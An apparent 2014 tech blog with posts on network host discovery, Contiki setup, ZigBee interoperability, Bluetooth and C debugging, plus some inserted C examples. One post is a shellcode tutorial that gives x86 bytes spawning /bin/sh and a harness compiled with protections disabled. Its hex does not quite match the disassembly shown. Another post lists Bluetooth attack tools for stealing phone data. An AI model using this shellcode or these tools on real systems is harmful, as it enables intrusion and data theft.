Wednesday 17 December 2014

IP alives in Local Networks


Platform: Ubuntu Linux, but it works on all Linux variants.

                           How to find the IP addresses that are alive in your local network. It is pretty easy if your firewall is not blocking you. Here I have one solution to find the IP addresses and MAC addresses in your local network.

   Download the "fping" package from the repo:
 
           sudo apt-get install fping



Type the first command:
       
        fping -g <range start> <range end>

     eg: fping -g 192.167.0.0 192.167.255.255

         fping sends an ICMP echo request to every machine in the range in parallel (it does not wait for one host to answer before probing the next). Only the alive machines will respond to this mass ping.

Type the second command:

       arp -v   or   arp -a

   You will get the IP address or hostname, MAC address and interface of every machine that answered.


   By using an appropriate shell script we can save this data into a database (this is necessary): when we do the mass ping, the ARP cache table fills with machine entries, but the cache is cleared after a certain time, and after that we cannot get the data any more.

  Use scripts and enjoy.
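As an added example (not from the original post), here is a small C program that does what the script above is meant to do: it reads the kernel ARP cache from /proc/net/arp, the same table that "arp -a" prints, and writes the resolved entries as CSV so they can be saved right after the fping sweep, before the cache entries age out. The sample table at the top is constructed, not captured from a real host; the /proc/net/arp column layout and the "complete" flag value 0x2 are Linux kernel facts, while the file name, function names and CSV layout are my own choices.

```c
/* arp_snapshot.c: added example, not from the original post.
 * Reads the kernel ARP cache (/proc/net/arp, the table "arp -a" prints)
 * and writes the complete entries as CSV, so they can be saved right
 * after an fping sweep, before the cache entries age out. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <time.h>

#define ATF_COM 0x02   /* "complete" bit in the Flags column of /proc/net/arp */

struct arp_entry {
    char ip[64];
    char mac[32];
    char dev[32];
    unsigned flags;
};

/* Constructed sample in /proc/net/arp layout (not captured from a real host):
 * a router, a host that never answered (flags 0x0), and a workstation. */
static const char SAMPLE_ARP[] =
    "IP address       HW type     Flags       HW address            Mask     Device\n"
    "192.168.0.1      0x1         0x2         02:00:00:00:00:01     *        eth0\n"
    "192.168.0.7      0x1         0x0         00:00:00:00:00:00     *        eth0\n"
    "192.168.0.23     0x1         0x2         02:00:00:00:00:17     *        eth0\n";

/* Parse one line of /proc/net/arp into *e. Returns 1 for a complete
 * (resolved) entry, 0 for the header line, a malformed line, or an entry
 * the kernel is still waiting on (no reply yet, so no usable MAC). */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    char hwtype[16], mask[16];
    int n = sscanf(line, "%63s %15s %x %31s %15s %31s",
                   e->ip, hwtype, &e->flags, e->mac, mask, e->dev);
    if (n != 6)
        return 0;                       /* header or truncated line */
    if (!(e->flags & ATF_COM))
        return 0;                       /* incomplete: host never answered */
    if (strcmp(e->mac, "00:00:00:00:00:00") == 0)
        return 0;
    return 1;
}

/* Copy every complete entry from `in` to `out` as "epoch,ip,mac,dev".
 * Returns the number of rows written. */
int dump_arp_stream(FILE *in, FILE *out)
{
    char line[256];
    struct arp_entry e;
    int rows = 0;
    long now = (long)time(NULL);

    while (fgets(line, sizeof line, in)) {
        if (!parse_arp_line(line, &e))
            continue;
        fprintf(out, "%ld,%s,%s,%s\n", now, e.ip, e.mac, e.dev);
        rows++;
    }
    return rows;
}

/* Same, for a table on disk. Returns -1 if the file cannot be opened. */
int dump_arp_table(const char *path, FILE *out)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    int rows = dump_arp_stream(f, out);
    fclose(f);
    return rows;
}

/* Self-check on the constructed sample: rows written for it. */
int sample_row_count(void)
{
    FILE *in = fmemopen((void *)SAMPLE_ARP, sizeof SAMPLE_ARP - 1, "r");
    FILE *out = tmpfile();
    if (in == NULL || out == NULL)
        return -1;
    int rows = dump_arp_stream(in, out);
    fclose(in);
    fclose(out);
    return rows;
}

int main(int argc, char **argv)
{
    /* Default to the live kernel table; a file argument replays a saved copy. */
    const char *path = argc > 1 ? argv[1] : "/proc/net/arp";
    int rows = dump_arp_table(path, stdout);
    if (rows < 0) {
        perror(path);
        return 1;
    }
    fprintf(stderr, "%d complete ARP entries written\n", rows);
    return 0;
}
```

Run it immediately after the fping sweep and redirect stdout to a file (or pipe it into your database import). Entries with flags 0x0 are addresses the kernel sent an ARP request for but never got a reply from; they carry an all-zero MAC and are skipped, so the output only lists hosts that really answered.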




Wednesday 5 November 2014

Contiki and Cooja Installation in Ubuntu


        Contiki is a wireless sensor device OS used to build small nodes in a Wireless Sensor Network. It is very easy to port to any embedded, resource-constrained device. If you are working on an Internet of Things like application, this OS is very suitable for building a sensor node application on it. How to install the Contiki OS and its simulator on an Ubuntu machine to develop sensor applications is given below. Try it.

1. Install the following packages through the apt command

  sudo apt-get install build-essential binutils-msp430 gcc-msp430 msp430-libc binutils-avr gcc-avr gdb-avr avr-libc avrdude openjdk-7-jdk openjdk-7-jre ant libncurses5-dev doxygen git
 
2. Clone the development packages of Contiki.
 
        git clone git://github.com/contiki-os/contiki.git contiki
 
3. Go to the contiki directory (the clone above names it "contiki"), run the make command and run the output file.
cd contiki/examples/hello-world
make TARGET=native
./hello-world.native
4. How to run Contiki OS on a micaz mote? Usually the micaz mote runs TinyOS, but here we can port Contiki OS onto the micaz mote.

 make TARGET=micaz savetarget
 make hello-world.upload
 make TARGET=micaz hello-world.upload PORT=/dev/ttyUSB0


5. Running the network simulator Cooja.

     Start Cooja. It is a network simulator for testing a sensor network and its running parameters, and it is very suitable for building a small sensor network simulation.

cd contiki/tools/cooja
ant run

 If you get any error while running the ant command, just update the git clone by using the following command.

git submodule update --init

6. The Cooja network simulator window appears.
   Cooja opens its main window
   Create a simulation (the New Simulation window)
   Choose a mote type from the list and compile it
   Select the number of motes: one mote is added to the window
   Again select 20 nodes in an elliptical topology: 20 nodes are added to the window
   Start the simulation: it shows each node's range and connection pattern
   Simulation of motes placed at random, with 100 motes

Cooja, the wireless sensor network simulator, helps to understand the sensor motes' operation, their radio channel allocation and power trace. But it has some limitations when simulating a large number of sensor nodes.

Wednesday 29 October 2014

Shellcode



How to write a simple shellcode ...?


1. A simple C program that runs /bin/sh
#include <unistd.h>

int main(int argc, char *argv[])
{
   char *shell[2];

   shell[0] = "/bin/sh";   /* program to execute */
   shell[1] = NULL;        /* argv must be NULL-terminated */
   execve(shell[0], shell, NULL);
   return 0;
}
2. Type the commands
# gcc shellexpt.c -o shellexpt

# objdump -d ./shellexpt


shellexpt:     file format elf32-i386

Disassembly of section .text:

08048074 <_start>:
 8048074:       31 c0      xor     %eax, %eax
 8048076:       b0 46      mov     $0x46, %al
 8048078:       31 db      xor     %ebx, %ebx
 804807a:       31 c9      xor     %ecx, %ecx
 804807c:       eb 16      jmp     8048094 <ender>

0804807e <starter>:
 804807e:       5b         pop     %ebx
 804807f:       31 c0      xor     %eax, %eax
 8048081:       88 43 07   mov     %al, 0x7(%ebx)
 8048084:       89 5b 08   mov     %ebx, 0x8(%ebx)
 8048087:       89 43 0c   mov     %eax, 0xc(%ebx)
 804808a:       b0 0b      mov     $0xb, %al
 804808c:       8d 4b 08   lea     0x8(%ebx), %ecx
 804808f:       8d 53 0c   lea     0xc(%ebx), %edx
 8048092:       cd 80      int     $0x80

08048094 <ender>:
 8048094:       e8 e5 ff ff ff    call   804807e <starter>
 8048099:       2f                das
 804809a:       62 69 6e          bound  %ebp, 0x6e(%ecx)
 804809d:       2f                das
 804809e:       73 68             jae    8048108 <ender+0x74>
 80480a0:       4e                dec    %esi
 80480a1:       41                inc    %ecx
 80480a2:       41                inc    %ecx
 80480a3:       41                inc    %ecx
 80480a4:       41                inc    %ecx
 80480a5:       42                inc    %edx
 80480a6:       42                inc    %edx
 80480a7:       42                inc    %edx
 80480a8:       42                inc    %edx

 3. Collect the hex code from the disassembly

 "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
 "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
 "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
 "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
 "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
  4. Create a shellcode program by using this hex code
 
/*shell_exec.c*/
#include <unistd.h>

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"
              "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
              "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"
              "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"
              "\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char **argv)
{
    /* creating a function pointer that points at the byte array */
    int (*func)();
    func = (int (*)()) code;
    /* jump into the bytes; this only works when the data page is executable */
    (*func)();
    return 0;
}
5. Compile and run the code

   # gcc -fno-stack-protector -z execstack shell_exec.c

   # ./a.out
6. Result
      You get a /bin/sh shell.
7. Try more shellcode
  
     Jonathan Salwan's shellcode database
     Shell-code project
     Shell-code Python injector (released; download available)
     Shell-code tutorials T1, T2
     Exploit-DB shellcode archive
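As an added example (not from the original post), the following C program reports whether a binary was linked the way the compile step above requires. The linker records that request in a PT_GNU_STACK program header: with "-z execstack" the header carries PF_X, which on x86 also makes the data page holding code[] executable; a hardened binary carries PT_GNU_STACK with RW only, and the jump into code[] then faults. The structure and constant names come from the system <elf.h>; a little-endian (x86) ELF layout is assumed, and the images used by the self-check are constructed in build_test_image and are not loadable programs.

```c
/* stackcheck.c: added example, not from the original post.
 * Reports what an ELF file's PT_GNU_STACK program header asks for. Linking
 * with "-z execstack" sets PF_X on that header; a hardened binary carries
 * the header with RW only. Little-endian (x86) ELF layout assumed. */
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum stack_verdict {
    STACK_BAD_ELF   = -1,  /* not an ELF image, or truncated */
    STACK_NX        = 0,   /* PT_GNU_STACK present without PF_X */
    STACK_EXEC      = 1,   /* PT_GNU_STACK present with PF_X (-z execstack) */
    STACK_NO_HEADER = 2    /* no PT_GNU_STACK: old toolchain; loader's old default was executable */
};

/* Walk the program headers of a 32- or 64-bit ELF image held in memory. */
int elf_stack_verdict(const unsigned char *buf, size_t len)
{
    uint64_t phoff;
    unsigned phnum, phentsize, i;
    int is64;

    if (len < EI_NIDENT || memcmp(buf, ELFMAG, SELFMAG) != 0)
        return STACK_BAD_ELF;
    is64 = buf[EI_CLASS] == ELFCLASS64;
    if (is64) {
        Elf64_Ehdr eh;
        if (len < sizeof eh) return STACK_BAD_ELF;
        memcpy(&eh, buf, sizeof eh);
        phoff = eh.e_phoff; phnum = eh.e_phnum; phentsize = eh.e_phentsize;
        if (phentsize < sizeof(Elf64_Phdr)) return STACK_BAD_ELF;
    } else if (buf[EI_CLASS] == ELFCLASS32) {
        Elf32_Ehdr eh;
        if (len < sizeof eh) return STACK_BAD_ELF;
        memcpy(&eh, buf, sizeof eh);
        phoff = eh.e_phoff; phnum = eh.e_phnum; phentsize = eh.e_phentsize;
        if (phentsize < sizeof(Elf32_Phdr)) return STACK_BAD_ELF;
    } else {
        return STACK_BAD_ELF;
    }
    for (i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        uint32_t type, flags;
        if (off > len || len - off < phentsize)     /* table runs past end of file */
            return STACK_BAD_ELF;
        if (is64) {
            Elf64_Phdr ph; memcpy(&ph, buf + off, sizeof ph);
            type = ph.p_type; flags = ph.p_flags;
        } else {
            Elf32_Phdr ph; memcpy(&ph, buf + off, sizeof ph);
            type = ph.p_type; flags = ph.p_flags;
        }
        if (type == PT_GNU_STACK)
            return (flags & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_NO_HEADER;
}

/* Constructed minimal 32-bit ELF image (header plus at most one PT_GNU_STACK
 * entry) for exercising the checker without a real binary; not loadable.
 * Returns the image length, or 0 if `cap` is too small. */
size_t build_test_image(int with_stack_hdr, uint32_t stack_flags,
                        unsigned char *out, size_t cap)
{
    Elf32_Ehdr eh; Elf32_Phdr ph;
    size_t need = sizeof eh + sizeof ph;
    if (cap < need) return 0;
    memset(&eh, 0, sizeof eh); memset(&ph, 0, sizeof ph);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32; eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_type = ET_EXEC; eh.e_machine = EM_386;
    eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof ph;
    eh.e_phnum = with_stack_hdr ? 1 : 0;
    ph.p_type = PT_GNU_STACK; ph.p_flags = stack_flags;
    memcpy(out, &eh, sizeof eh); memcpy(out + sizeof eh, &ph, sizeof ph);
    return need;
}

/* Verdict for a constructed image with the given header and flags. */
int verdict_for(int with_stack_hdr, uint32_t stack_flags)
{
    unsigned char img[128];
    size_t n = build_test_image(with_stack_hdr, stack_flags, img, sizeof img);
    return n ? elf_stack_verdict(img, n) : STACK_BAD_ELF;
}

/* Verdict for a file on disk; STACK_BAD_ELF if it cannot be read. */
int file_stack_verdict(const char *path)
{
    int rc = STACK_BAD_ELF;
    FILE *f = fopen(path, "rb");
    if (f == NULL) return rc;
    if (fseek(f, 0, SEEK_END) == 0) {
        long sz = ftell(f);
        unsigned char *buf = sz > 0 ? malloc((size_t)sz) : NULL;
        if (buf && fseek(f, 0, SEEK_SET) == 0 && fread(buf, 1, (size_t)sz, f) == (size_t)sz)
            rc = elf_stack_verdict(buf, (size_t)sz);
        free(buf);
    }
    fclose(f);
    return rc;
}

int main(int argc, char **argv)
{
    if (argc < 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    int v = file_stack_verdict(argv[1]);
    printf("%s: %s\n", argv[1], v == STACK_EXEC ? "executable stack (-z execstack)" :
           v == STACK_NX ? "non-executable stack" :
           v == STACK_NO_HEADER ? "no PT_GNU_STACK header" : "not an ELF file");
    return v == STACK_NX ? 0 : 1;
}
```

Run it on the a.out from the compile step and on the same source built without "-z execstack" to see the two verdicts side by side; the exit status is 0 only for the non-executable case, so the check can sit in a build script. The same information is what "readelf -lW a.out" shows on its GNU_STACK line.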

Tuesday 28 October 2014

XBee IEEE 802.15.4 ZigBee OEM Stack Interoperability Issues with TinyOS IEEE 802.15.4 Stack


  1. The main problem of porting the stack over the IEEE 802.15.4 lower-layer stack is the lack of hardware and software specification details regarding important aspects of the beacon-enabled mode and the cluster-tree model.
  2. Synchronization techniques in cluster-tree deployments are another issue. For building a cluster network, synchronization is very much required, especially between the ZR, ZC and ZED, if all the devices are working under one PAN ID. Moreover, if a node is not properly synchronized there is a possibility of collisions in the GTS slots (the GTS provides guaranteed time for each device that intends to connect to the network); stack overflow is the result of this problem.
  3. XBee is a ZigBee Alliance group device and uses the ZigBee-compliant IEEE 802.15.4 stack for wireless communication. TinyOS is not ZigBee, but the micaz mote device we are using here is a ZigBee Alliance group device. That does not mean that communication between these two is possible; for that we need a ZigBee IEEE 802.15.4 stack in TinyOS for building the ZigBee protocol stack on it.
  4. The turnaround time of the CC2420 radio chipset for switching between transmitting and receiving data through the radio is 192 microseconds, which differs from the other stacks, especially in Alliance group devices like the OEM stack.
  5. In addition, the processing power available in the mote's microcontroller turned out to be quite limited for complying with the most demanding IEEE 802.15.4 timing constraints, especially for small beacon orders (BO < 3) and superframe orders (SO < 3). This makes these superframe configurations impossible to deploy, considering that the mote must also have capacity for processing other tasks.
  6. The ZigBee protocol stack has some processing limitations on the ATmega128RF; only a smarter and faster microcontroller can overcome this difficulty. The Open ZB forum expects to overcome this in the near future.
  7. The default TinyOS scheduler does not support task prioritization and is non-preemptive. Typically there are two different kinds of interrupt events in TinyOS, timers and radio; these events are captured by event handlers that normally post a task to the FIFO task queue, which significantly impacts the behaviour of the protocol stack.
  8. The interference between IEEE 802.15.4 and IEEE 802.11 radio channels, confirmed using an FFT spectrum analyser, had unpredictable effects on the results.
  9. Physical-layer related problems.
  10. Interference between radio channels (overcome the interference between these two standards by using the only IEEE 802.15.4 channel, channel 26 in the 2480 MHz band, that is completely outside the IEEE 802.11 frequency spectrum).
  11. RSSI-based localization inaccuracy (problem solved in Open ZB).
  1. A synchronized data request/reply method is used in the XBee ZigBee Alliance group device to accommodate the large collection of devices in the network.
  2. The timeslot registration techniques for a frame in TinyOS and in XBee devices differ a lot. In TinyOS, the DESTINATION device sends a frame to the SOURCE device by using the BROADCASTING timeslot channel, but in XBee only a BROADCASTING frame is allowed to pass through the channel.
  3. TinyOS doesn't have any superframe scheduling mechanism for handling multiple packets from the SOURCE devices.
  4. The TinyOS stack is NOT multi-lingual, nor is it very flexible. You basically compile with a group of defines set that determines exactly what kind of packets one is interested in. This is an artifact of TinyOS motes being extremely resource constrained.
  5. TinyOS does not follow any accurate simulation model for IEEE 802.15.4 and the ZigBee protocol focusing on the Guaranteed Time Slot (GTS) mechanism and the ZigBee hierarchical routing strategy in beacon-enabled cluster-tree wireless sensor networks.
  6. Implementing an energy-efficient beacon-enabled routing mechanism in TinyOS is really a challenging task.
  7. XBee uses 16 channels with a band gap of 5 MHz [2 MHz] and a 16-array orthogonal DSSS for maintaining the dynamic timeslot allocation for frames from the devices. TinyOS or OpenZB doesn't have any mechanism like that; it uses time-division based frame synchronization techniques [TDMA].
  8. A ZigBee-compliant IEEE 802.15.4 stack differs depending on its specification and networking topologies.
  9. In ZigBee wireless sensor technology, mainly three networking topologies are used for constructing a sensor network. According to the current IEEE 802.15.4/ZigBee specification, the synchronization technique in each topology is different from the others in beacon-enabled mode. The OpenZB forum says that they successfully resolved this issue by applying a time-division based synchronization technique.
  10. The OpenZB forum built a ZigBee stack on top of a modified IEEE 802.15.4 that is very much compatible with their stack. So we can't expect that this device will communicate with existing ZigBee Alliance group devices like XBee.
  11. I am still working on the OpenZB implementation on the Micaz mote device, because the vendors say that this device is a ZigBee Alliance group device and it has an OEM-modified IEEE-compliant stack on the bottom layer of the stack, so it can support the ZigBee protocol stack.
These are some issues faced while building an interoperable ZigBee stack over IEEE 802.15.4 / TinyOS / Micaz devices. An IEEE 802.15.4 ZigBee-compliant stack, a synchronization scheduling mechanism, a suitable superframe allocation method for avoiding frame collisions and guaranteed GTS for devices are some MAJOR ISSUES.

Bluetooth Development Essential


Bluetooth is a short-range wireless communication standard for sharing data end to end between two devices. Like other short-range wireless communication standards, Bluetooth uses the unlicensed 2.4 GHz band for its physical layer. It has a protocol stack to perform end-to-end applications and supports a wide range of applications in different embedded devices for short-range communication. Now it has become an essential communication standard in smart mobile and other devices in the market. Before developing an application for Bluetooth we should know it very well, to ease the development.

Bluetooth versions

   The Bluetooth Special Interest Group (SIG) is the body that oversees the development of Bluetooth standards and the licensing of the Bluetooth technologies and trademarks to manufacturers. The following are some Bluetooth versions that we are currently using in different sectors.

Bluetooth Protocol Stack

Baseband + Bluetooth Radio - physical-layer operation in Bluetooth, i.e. the transmission of data from one end to the other.

LMP - Link Management Protocol: provides a link to the application using the link channel and also participates in the multiplexing of channels using the PSM code in the link layer.

RFCOMM - RF virtual COM port, a serial communication emulator.

BNEP - Bluetooth Network Encapsulation Protocol: helps to provide a network stack for Bluetooth, so that SOCK_SEQPACKET and SOCK_STREAM socket communication with the device is possible.

L2CAP - Logical Link Control and Adaptation Protocol: provides a logical link connection to RFCOMM and any other application-layer protocol in the stack.

OBEX - Object Exchange Protocol, an application-layer protocol to perform data exchange operations between devices.

SDP - Service Discovery Protocol: helps to acquire information about the services running on the Bluetooth device.
 
Network topology
 
   Bluetooth has one topology named "scatternet" which helps to build a network of Bluetooth devices, but there are only a few implementations of it in practical scenarios. Actually a scatternet is a collection of small nets of 7 Bluetooth nodes, called piconets. A piconet consists of 7 nodes, and each node performs a direct link-to-link connection with another node. The node that hosts all the other nodes in the network is called the "MASTER" node, and a node that intends to connect to the MASTER node is called a SLAVE node.

Bluetooth Development Libraries

BlueZ :-
   If you are using Linux you can download it from the repo by using the command
      #sudo apt-get install bluez
hcidump :-
        Promiscuous sniffer for Bluetooth
      #sudo apt-get install bluez-hcidump
Bluecova :-
   Bluecova is a Java library for Bluetooth application development and it runs on a Java Virtual Machine.

Bluetooth Hacking Tools

BlueScanner – BlueScanner searches for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.
BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.
BTBrowser – Bluetooth Browser is a J2ME application that can browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that support JSR-82, the Java Bluetooth specification.
BTCrawler – BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service queries. It implements the BlueJacking and BlueSnarfing attacks.
Hacking Bluetooth Devices
BlueBugger – BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain unauthorized access to the phone book, call lists and other private information.
CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only supports some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. It should work on any PocketPC with the Microsoft Bluetooth stack.
Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++ and BlueSmack, has features such as Bluetooth address spoofing, an AT and an RFCOMM socket shell, and implements tools like carwhisperer, bss, an L2CAP packet generator, an L2CAP connection resetter, an RFCOMM scanner and a green plaque scanning mode.
Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.
Bluesnarfer – Bluesnarfer will download the phone book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flaw discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner and gain access to restricted portions of the stored data.
BTcrack – BTCrack is a Bluetooth passphrase (PIN) cracking tool. BTCrack aims to reconstruct the passkey and the link key from captured pairing exchanges.
Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.
BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.
BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

Tuesday 29 July 2014

C Code Optimization Tools for Linux Programmers

                                         I am not here to talk about how to write C code, but I would like to give some tips about optimizing code by using minimal tools. Nowadays a lot of tools (IDEs) are available in the market for debugging and optimizing code, but I always use some simple tools for my code optimization. We all know that C is the basis of all languages, so most people do not pay close attention while writing it, and that causes a lot of problems at run time. The most common problems are memory leaks, memory allocation errors, improper sizing of memory areas, structure padding, lack of accuracy in data-type specification, improper programming practices and unbalanced execution-time flow.

               Writing code is always a simple task, but optimizing that code is the major problem when you are writing a program in the HIL (Hardware Interface Layer). Optimization of code can easily be done by using a bunch of tools, but before that you should have a very good understanding of your program; only then can you change it according to your needs. Each programmer has their own style in their programs, me too. I always use direct memory addressing methods in my programs; that helps me to solve many problems before optimization is even done. DMA: a pointer addressing method which helps to scale structured and unstructured memory areas, especially when we are doing string operations or writing code for a device driver.

               I am here to tell you only a few optimization techniques which are commonly used in the optimization of C code.


1. How to check memory leaks in C programs?

Tool: Valgrind

         Valgrind is an excellent tool for memory leak checks, and it can easily be downloaded from the net for Linux machines.

:~$ sudo apt-get install valgrind

 :~$ valgrind <execbinary>


Valgrind output window
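As an added example, not part of the original post, here is a small program with a leaky and a fixed version of the same two routines, so there is something concrete to point Valgrind at: a lost heap block (the "memory leaks" problem named above) and a one-byte heap overrun (the "improper sizing of memory areas" problem). Function names and inputs are my own; the Valgrind messages quoted in the comments are the ones memcheck prints for these two defects.

```c
/* leakdemo.c: added example, not from the original post. Each routine comes
 * in a buggy and a fixed version so Valgrind has something to report on.
 * Build: gcc -g -O0 leakdemo.c -o leakdemo
 * Run:   valgrind --leak-check=full ./leakdemo
 * The leaky word counter shows up as "definitely lost" with the strdup()
 * line; the short malloc() shows up as "Invalid write of size 1". */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Leaky: takes a writable copy for strtok() and forgets to free it on
 * both return paths. Returns the number of whitespace-separated words. */
int count_words_leaky(const char *text)
{
    char *copy = strdup(text);
    if (copy == NULL)
        return -1;
    if (copy[0] == '\0')
        return 0;                          /* early return: copy leaked */
    int words = 0;
    for (char *tok = strtok(copy, " \t\n"); tok != NULL; tok = strtok(NULL, " \t\n"))
        words++;
    return words;                          /* normal return: copy leaked too */
}

/* Fixed: a single exit path, reached only after free(). */
int count_words_fixed(const char *text)
{
    char *copy = strdup(text);
    if (copy == NULL)
        return -1;
    int words = 0;
    for (char *tok = strtok(copy, " \t\n"); tok != NULL; tok = strtok(NULL, " \t\n"))
        words++;
    free(copy);
    return words;
}

/* Buggy: malloc(n) leaves no room for the terminating NUL, so the last
 * store lands one byte past the block. Caller frees the result. */
char *upper_copy_buggy(const char *s)
{
    size_t n = strlen(s);
    char *out = malloc(n);                 /* should be n + 1 */
    if (out == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)toupper((unsigned char)s[i]);
    out[n] = '\0';                         /* heap overrun: "Invalid write of size 1" */
    return out;
}

/* Fixed: one extra byte for the terminator. */
char *upper_copy_fixed(const char *s)
{
    size_t n = strlen(s);
    char *out = malloc(n + 1);
    if (out == NULL)
        return NULL;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)toupper((unsigned char)s[i]);
    out[n] = '\0';
    return out;
}

int main(void)
{
    /* Constructed inputs; compare Valgrind's report for the two halves. */
    const char *text = "the quick  brown\tfox";
    printf("leaky count: %d\n", count_words_leaky(text));
    printf("fixed count: %d\n", count_words_fixed(text));
    char *a = upper_copy_buggy("hello");
    char *b = upper_copy_fixed("hello");
    printf("buggy: %s\nfixed: %s\n", a ? a : "(null)", b ? b : "(null)");
    free(a);
    free(b);
    return 0;
}
```

Both halves print the same answers, which is the point: the program looks correct until Valgrind runs it. Build with -g so the report names the source line of the strdup() and malloc() calls; with -O2 the compiler may reorder or inline enough that the line numbers become harder to read.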




2. How to check the execution time taken by each system call in your program

Tool: strace

          strace is a tool which helps you to know how your program execution flows internally through each system call, and it can even calculate the time spent in each system call made by your program.


3. gdb Debugger


      GDB (the GNU Debugger) is a tool widely used for optimization of code. This tool will help to check the stack of each function used in our programs. If you have very good knowledge of GDB, then you don't need any other tool for optimizing the code.

Tuesday 29 October 2013